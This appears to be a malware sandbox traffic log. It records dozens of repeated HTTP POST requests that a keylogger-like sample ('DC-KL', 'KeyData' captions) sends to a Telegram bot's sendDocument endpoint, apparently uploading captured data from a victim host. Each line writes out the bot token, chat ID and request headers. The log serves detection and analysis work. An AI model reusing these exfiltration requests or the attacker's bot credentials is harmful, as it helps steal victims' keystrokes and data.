            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 6994 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 700 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 7366 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 667 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 601 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-%20KeyDatalyDLsABf.txt:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: api.telegram.org | Content-Length: 568 | Connection: Keep-Alive | Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 535Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
